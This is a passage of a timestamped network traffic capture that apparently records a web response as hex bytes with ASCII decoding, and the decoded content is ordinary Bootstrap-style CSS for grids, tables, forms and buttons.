                                                                          2023-11-21 16:58:40 UTC96INData Raw: 30 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 33 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 6d 64 2d 31 31 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 39 31 2e 36 36 36 36 36 37 25 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 39 39 32 70 78 29 7b 2e 63 6f 6c 2d 6c 67 7b 2d 6d 73 2d 66 6c 65 78 2d 70 72 65 66 65 72 72 65 64 2d 73 69 7a 65 3a 30 3b 66 6c 65 78 2d 62 61 73 69 73 3a 30 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 31 3b 2d 6d 73 2d 66 6c 65 78 2d 70 6f 73 69 74 69 76 65 3a 31 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 63 6f 6c 2d 6c 67 2d 61 75 74 6f 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 66 6c 65 78
                                                                          Data Ascii: 0{margin-left:83.333333%}.offset-md-11{margin-left:91.666667%}}@media (min-width:992px){.col-lg{-ms-flex-preferred-size:0;flex-basis:0;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;max-width:100%}.col-lg-auto{-webkit-box-flex:0;-ms-flex:0 0 auto;flex
                                                                          2023-11-21 16:58:40 UTC97INData Raw: 69 6e 61 6c 2d 67 72 6f 75 70 3a 30 3b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 2d 31 3b 6f 72 64 65 72 3a 2d 31 7d 2e 6f 72 64 65 72 2d 6c 67 2d 6c 61 73 74 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 31 34 3b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 33 3b 6f 72 64 65 72 3a 31 33 7d 2e 6f 72 64 65 72 2d 6c 67 2d 30 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 31 3b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 30 3b 6f 72 64 65 72 3a 30 7d 2e 6f 72 64 65 72 2d 6c 67 2d 31 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 32 3b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 3b 6f 72 64 65 72 3a 31 7d 2e 6f 72 64 65 72 2d 6c 67 2d 32 7b 2d 77
                                                                          Data Ascii: inal-group:0;-ms-flex-order:-1;order:-1}.order-lg-last{-webkit-box-ordinal-group:14;-ms-flex-order:13;order:13}.order-lg-0{-webkit-box-ordinal-group:1;-ms-flex-order:0;order:0}.order-lg-1{-webkit-box-ordinal-group:2;-ms-flex-order:1;order:1}.order-lg-2{-w
                                                                          2023-11-21 16:58:40 UTC98INData Raw: 37 25 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 63 6f 6c 2d 78 6c 7b 2d 6d 73 2d 66 6c 65 78 2d 70 72 65 66 65 72 72 65 64 2d 73 69 7a 65 3a 30 3b 66 6c 65 78 2d 62 61 73 69 73 3a 30 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 31 3b 2d 6d 73 2d 66 6c 65 78 2d 70 6f 73 69 74 69 76 65 3a 31 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 63 6f 6c 2d 78 6c 2d 61 75 74 6f 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 7d 2e 63 6f 6c 2d 78 6c 2d 31 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d
                                                                          Data Ascii: 7%}}@media (min-width:1200px){.col-xl{-ms-flex-preferred-size:0;flex-basis:0;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;max-width:100%}.col-xl-auto{-webkit-box-flex:0;-ms-flex:0 0 auto;flex:0 0 auto;width:auto;max-width:none}.col-xl-1{-webkit-box-
                                                                          2023-11-21 16:58:40 UTC100INData Raw: 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 31 34 3b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 33 3b 6f 72 64 65 72 3a 31 33 7d 2e 6f 72 64 65 72 2d 78 6c 2d 30 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 31 3b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 30 3b 6f 72 64 65 72 3a 30 7d 2e 6f 72 64 65 72 2d 78 6c 2d 31 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 32 3b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 3b 6f 72 64 65 72 3a 31 7d 2e 6f 72 64 65 72 2d 78 6c 2d 32 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 33 3b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 32 3b 6f 72 64 65 72 3a 32 7d 2e 6f 72 64 65 72 2d
                                                                          Data Ascii: bkit-box-ordinal-group:14;-ms-flex-order:13;order:13}.order-xl-0{-webkit-box-ordinal-group:1;-ms-flex-order:0;order:0}.order-xl-1{-webkit-box-ordinal-group:2;-ms-flex-order:1;order:1}.order-xl-2{-webkit-box-ordinal-group:3;-ms-flex-order:2;order:2}.order-
                                                                          2023-11-21 16:58:40 UTC101INData Raw: 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 74 61 62 6c 65 20 74 64 2c 2e 74 61 62 6c 65 20 74 68 7b 70 61 64 64 69 6e 67 3a 2e 37 35 72 65 6d 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 65 65 32 65 36 7d 2e 74 61 62 6c 65 20 74 68 65 61 64 20 74 68 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 6f 74 74 6f 6d 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 20 23 64 65 65 32 65 36 7d 2e 74 61 62 6c 65 20 74 62 6f 64 79 2b 74 62 6f 64 79 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 23 64 65 65 32 65 36 7d 2e 74 61 62 6c 65 20 2e 74 61 62 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f
                                                                          Data Ascii: ckground-color:transparent}.table td,.table th{padding:.75rem;vertical-align:top;border-top:1px solid #dee2e6}.table thead th{vertical-align:bottom;border-bottom:2px solid #dee2e6}.table tbody+tbody{border-top:2px solid #dee2e6}.table .table{background-co
                                                                          2023-11-21 16:58:40 UTC102INData Raw: 6f 3e 74 68 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 62 65 65 35 65 62 7d 2e 74 61 62 6c 65 2d 68 6f 76 65 72 20 2e 74 61 62 6c 65 2d 69 6e 66 6f 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 61 62 64 64 65 35 7d 2e 74 61 62 6c 65 2d 68 6f 76 65 72 20 2e 74 61 62 6c 65 2d 69 6e 66 6f 3a 68 6f 76 65 72 3e 74 64 2c 2e 74 61 62 6c 65 2d 68 6f 76 65 72 20 2e 74 61 62 6c 65 2d 69 6e 66 6f 3a 68 6f 76 65 72 3e 74 68 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 61 62 64 64 65 35 7d 2e 74 61 62 6c 65 2d 77 61 72 6e 69 6e 67 2c 2e 74 61 62 6c 65 2d 77 61 72 6e 69 6e 67 3e 74 64 2c 2e 74 61 62 6c 65 2d 77 61 72 6e 69 6e 67 3e 74 68 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 65 65 62 61 7d
                                                                          Data Ascii: o>th{background-color:#bee5eb}.table-hover .table-info:hover{background-color:#abdde5}.table-hover .table-info:hover>td,.table-hover .table-info:hover>th{background-color:#abdde5}.table-warning,.table-warning>td,.table-warning>th{background-color:#ffeeba}
                                                                          2023-11-21 16:58:40 UTC104INData Raw: 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 32 35 32 39 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 33 32 33 38 33 65 7d 2e 74 61 62 6c 65 20 2e 74 68 65 61 64 2d 6c 69 67 68 74 20 74 68 7b 63 6f 6c 6f 72 3a 23 34 39 35 30 35 37 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 39 65 63 65 66 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 65 65 32 65 36 7d 2e 74 61 62 6c 65 2d 64 61 72 6b 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 32 35 32 39 7d 2e 74 61 62 6c 65 2d 64 61 72 6b 20 74 64 2c 2e 74 61 62 6c 65 2d 64 61 72 6b 20 74 68 2c 2e 74 61 62 6c 65 2d 64 61 72 6b 20 74 68 65 61 64 20 74 68 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 33 32 33 38 33 65 7d 2e 74 61 62 6c 65 2d 64
                                                                          Data Ascii: ckground-color:#212529;border-color:#32383e}.table .thead-light th{color:#495057;background-color:#e9ecef;border-color:#dee2e6}.table-dark{color:#fff;background-color:#212529}.table-dark td,.table-dark th,.table-dark thead th{border-color:#32383e}.table-d
                                                                          2023-11-21 16:58:40 UTC105INData Raw: 2d 77 65 62 6b 69 74 2d 6f 76 65 72 66 6c 6f 77 2d 73 63 72 6f 6c 6c 69 6e 67 3a 74 6f 75 63 68 3b 2d 6d 73 2d 6f 76 65 72 66 6c 6f 77 2d 73 74 79 6c 65 3a 2d 6d 73 2d 61 75 74 6f 68 69 64 69 6e 67 2d 73 63 72 6f 6c 6c 62 61 72 7d 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 3e 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 7b 62 6f 72 64 65 72 3a 30 7d 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 2e 33 37 35 72 65 6d 20 2e 37 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 3b 63 6f 6c 6f 72 3a 23 34 39 35 30 35 37 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72
                                                                          Data Ascii: -webkit-overflow-scrolling:touch;-ms-overflow-style:-ms-autohiding-scrollbar}.table-responsive>.table-bordered{border:0}.form-control{display:block;width:100%;padding:.375rem .75rem;font-size:1rem;line-height:1.5;color:#495057;background-color:#fff;backgr
                                                                          2023-11-21 16:58:40 UTC106INData Raw: 3a 63 61 6c 63 28 2e 35 72 65 6d 20 2b 20 31 70 78 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 2e 63 6f 6c 2d 66 6f 72 6d 2d 6c 61 62 65 6c 2d 73 6d 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 63 61 6c 63 28 2e 32 35 72 65 6d 20 2b 20 31 70 78 29 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 63 61 6c 63 28 2e 32 35 72 65 6d 20 2b 20 31 70 78 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 70 6c 61 69 6e 74 65 78 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 2e 33 37 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a
                                                                          Data Ascii: :calc(.5rem + 1px);font-size:1.25rem;line-height:1.5}.col-form-label-sm{padding-top:calc(.25rem + 1px);padding-bottom:calc(.25rem + 1px);font-size:.875rem;line-height:1.5}.form-control-plaintext{display:block;width:100%;padding-top:.375rem;padding-bottom:
                                                                          2023-11-21 16:58:40 UTC108INData Raw: 70 65 6e 64 3e 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 74 65 78 74 7b 70 61 64 64 69 6e 67 3a 2e 32 35 72 65 6d 20 2e 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 72 65 6d 7d 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d 3e 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 70 70 65 6e 64 3e 73 65 6c 65 63 74 2e 62 74 6e 3a 6e 6f 74 28 5b 73 69 7a 65 5d 29 3a 6e 6f 74 28 5b 6d 75 6c 74 69 70 6c 65 5d 29 2c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d 3e 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 70 70 65 6e 64 3e 73 65 6c 65 63 74 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 74 65 78 74 3a 6e 6f 74 28 5b 73 69 7a 65 5d 29 3a 6e 6f 74 28 5b 6d 75 6c 74 69
                                                                          Data Ascii: pend>.input-group-text{padding:.25rem .5rem;font-size:.875rem;line-height:1.5;border-radius:.2rem}.input-group-sm>.input-group-append>select.btn:not([size]):not([multiple]),.input-group-sm>.input-group-append>select.input-group-text:not([size]):not([multi
                                                                          2023-11-21 16:58:40 UTC109INData Raw: 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 2e 66 6f 72 6d 2d 74 65 78 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2e 32 35 72 65 6d 7d 2e 66 6f 72 6d 2d 72 6f 77 7b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 35 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 2e 66 6f 72 6d 2d 72 6f 77 3e 2e 63 6f 6c 2c 2e 66 6f 72 6d 2d 72 6f 77 3e 5b 63 6c 61 73 73 2a 3d 63 6f 6c 2d 5d 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d
                                                                          Data Ascii: in-bottom:1rem}.form-text{display:block;margin-top:.25rem}.form-row{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;margin-right:-5px;margin-left:-5px}.form-row>.col,.form-row>[class*=col-]{padding-right:5px;padding-
                                                                          2023-11-21 16:58:40 UTC110INData Raw: 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 38 61 37 34 35 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 2e 32 72 65 6d 20 72 67 62 61 28 34 30 2c 31 36 37 2c 36 39 2c 2e 32 35 29 7d 2e 63 75 73 74 6f 6d 2d 73 65 6c 65 63 74 2e 69 73 2d 76 61 6c 69 64 7e 2e 76 61 6c 69 64 2d 66 65 65 64 62 61 63 6b 2c 2e 63 75 73 74 6f 6d 2d 73 65 6c 65 63 74 2e 69 73 2d 76 61 6c 69 64 7e 2e 76 61 6c 69 64 2d 74 6f 6f 6c 74 69 70 2c 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2e 69 73 2d 76 61 6c 69 64 7e 2e 76 61 6c 69 64 2d 66 65 65 64 62 61 63 6b 2c 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2e 69 73 2d 76 61 6c 69 64 7e 2e 76 61 6c 69 64 2d 74 6f 6f 6c 74 69 70 2c 2e 77 61 73 2d 76 61 6c 69 64 61 74 65 64 20 2e 63 75 73 74 6f 6d 2d 73 65 6c 65 63 74 3a 76 61 6c 69 64
                                                                          Data Ascii: border-color:#28a745;box-shadow:0 0 0 .2rem rgba(40,167,69,.25)}.custom-select.is-valid~.valid-feedback,.custom-select.is-valid~.valid-tooltip,.form-control.is-valid~.valid-feedback,.form-control.is-valid~.valid-tooltip,.was-validated .custom-select:valid
                                                                          2023-11-21 16:58:40 UTC112INData Raw: 38 30 30 30 0d 0a 2e 77 61 73 2d 76 61 6c 69 64 61 74 65 64 20 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 3a 76 61 6c 69 64 7e 2e 76 61 6c 69 64 2d 74 6f 6f 6c 74 69 70 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 2e 69 73 2d 76 61 6c 69 64 3a 63 68 65 63 6b 65 64 7e 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 3a 3a 62 65 66 6f 72 65 2c 2e 77 61 73 2d 76 61 6c 69 64 61 74 65 64 20 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 3a 76 61 6c 69 64 3a 63 68 65 63 6b 65 64 7e 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 3a 3a 62 65 66 6f 72 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 34 63 65 35 37 7d 2e 63
                                                                          Data Ascii: 8000.was-validated .custom-control-input:valid~.valid-tooltip{display:block}.custom-control-input.is-valid:checked~.custom-control-label::before,.was-validated .custom-control-input:valid:checked~.custom-control-label::before{background-color:#34ce57}.c
                                                                          2023-11-21 16:58:40 UTC113INData Raw: 2c 35 33 2c 36 39 2c 2e 38 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 72 65 6d 7d 2e 63 75 73 74 6f 6d 2d 73 65 6c 65 63 74 2e 69 73 2d 69 6e 76 61 6c 69 64 2c 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2e 69 73 2d 69 6e 76 61 6c 69 64 2c 2e 77 61 73 2d 76 61 6c 69 64 61 74 65 64 20 2e 63 75 73 74 6f 6d 2d 73 65 6c 65 63 74 3a 69 6e 76 61 6c 69 64 2c 2e 77 61 73 2d 76 61 6c 69 64 61 74 65 64 20 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 3a 69 6e 76 61 6c 69 64 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 63 33 35 34 35 7d 2e 63 75 73 74 6f 6d 2d 73 65 6c 65 63 74 2e 69 73 2d 69 6e 76 61 6c 69 64 3a 66 6f 63 75 73 2c 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2e 69 73 2d 69 6e 76 61 6c 69 64 3a 66 6f 63 75 73 2c 2e 77 61 73 2d 76 61 6c 69 64 61 74 65 64
                                                                          Data Ascii: ,53,69,.8);border-radius:.2rem}.custom-select.is-invalid,.form-control.is-invalid,.was-validated .custom-select:invalid,.was-validated .form-control:invalid{border-color:#dc3545}.custom-select.is-invalid:focus,.form-control.is-invalid:focus,.was-validated
                                                                          2023-11-21 16:58:40 UTC114INData Raw: 6f 6c 2d 69 6e 70 75 74 3a 69 6e 76 61 6c 69 64 7e 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 3a 3a 62 65 66 6f 72 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 66 61 32 61 39 7d 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 2e 69 73 2d 69 6e 76 61 6c 69 64 7e 2e 69 6e 76 61 6c 69 64 2d 66 65 65 64 62 61 63 6b 2c 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 2e 69 73 2d 69 6e 76 61 6c 69 64 7e 2e 69 6e 76 61 6c 69 64 2d 74 6f 6f 6c 74 69 70 2c 2e 77 61 73 2d 76 61 6c 69 64 61 74 65 64 20 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 3a 69 6e 76 61 6c 69 64 7e 2e 69 6e 76 61 6c 69 64 2d 66 65 65 64 62 61 63 6b 2c 2e 77 61 73 2d 76 61 6c 69 64 61 74 65 64 20 2e 63 75 73
                                                                          Data Ascii: ol-input:invalid~.custom-control-label::before{background-color:#efa2a9}.custom-control-input.is-invalid~.invalid-feedback,.custom-control-input.is-invalid~.invalid-tooltip,.was-validated .custom-control-input:invalid~.invalid-feedback,.was-validated .cus
                                                                          2023-11-21 16:58:40 UTC116INData Raw: 7d 2e 66 6f 72 6d 2d 69 6e 6c 69 6e 65 7b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 66 6c 6f 77 3a 72 6f 77 20 77 72 61 70 3b 66 6c 65 78 2d 66 6c 6f 77 3a 72 6f 77 20 77 72 61 70 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 66 6f 72 6d 2d 69 6e 6c 69 6e 65 20 2e 66 6f 72 6d 2d 63 68
                                                                          Data Ascii: }.form-inline{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-flow:row wrap;flex-flow:row wrap;-webkit-box-align:center;-ms-flex-align:center;align-items:center}.form-inline .form-ch
                                                                          2023-11-21 16:58:40 UTC117INData Raw: 77 65 62 6b 69 74 2d 62 6f 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 66 6f 72 6d 2d 69 6e 6c 69 6e 65 20 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 7d 2e 62 74 6e 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 77 68 69 74 65 2d 73 70 61 63
                                                                          Data Ascii: webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center}.form-inline .custom-control-label{margin-bottom:0}}.btn{display:inline-block;font-weight:400;text-align:center;white-spac
                                                                          2023-11-21 16:58:40 UTC118INData Raw: 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 3a 61 63 74 69 76 65 2c 2e 73 68 6f 77 3e 2e 62 74 6e 2d 70 72 69 6d 61 72 79 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 36 32 63 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 35 63 62 66 7d 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 2e 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 3a 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 2e 73 68 6f 77 3e 2e 62 74 6e 2d 70 72 69 6d 61 72 79 2e
                                                                          Data Ascii: disabled):not(.disabled):active,.show>.btn-primary.dropdown-toggle{color:#fff;background-color:#0062cc;border-color:#005cbf}.btn-primary:not(:disabled):not(.disabled).active:focus,.btn-primary:not(:disabled):not(.disabled):active:focus,.show>.btn-primary.
                                                                          2023-11-21 16:58:40 UTC120INData Raw: 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 38 61 37 34 35 7d 2e 62 74 6e 2d 73 75 63 63 65 73 73 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 2e 61 63 74 69 76 65 2c 2e 62 74 6e 2d 73 75 63 63 65 73 73 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 3a 61 63 74 69 76 65 2c 2e 73 68 6f 77 3e 2e 62 74 6e 2d 73 75 63 63 65 73 73 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 65 37 65 33 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 31 63 37 34 33 30 7d 2e 62 74 6e 2d 73 75 63 63 65 73 73 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 2e 61
                                                                          Data Ascii: rder-color:#28a745}.btn-success:not(:disabled):not(.disabled).active,.btn-success:not(:disabled):not(.disabled):active,.show>.btn-success.dropdown-toggle{color:#fff;background-color:#1e7e34;border-color:#1c7430}.btn-success:not(:disabled):not(.disabled).a
